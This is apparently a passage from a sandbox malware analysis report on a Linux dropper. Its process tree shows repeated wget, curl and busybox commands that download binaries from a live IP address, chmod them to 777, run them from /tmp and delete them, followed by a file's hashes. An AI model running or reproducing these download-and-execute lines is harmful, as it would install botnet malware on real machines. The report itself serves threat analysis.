/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:938
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:944
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:950
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:956
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:962
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:968
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:974
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97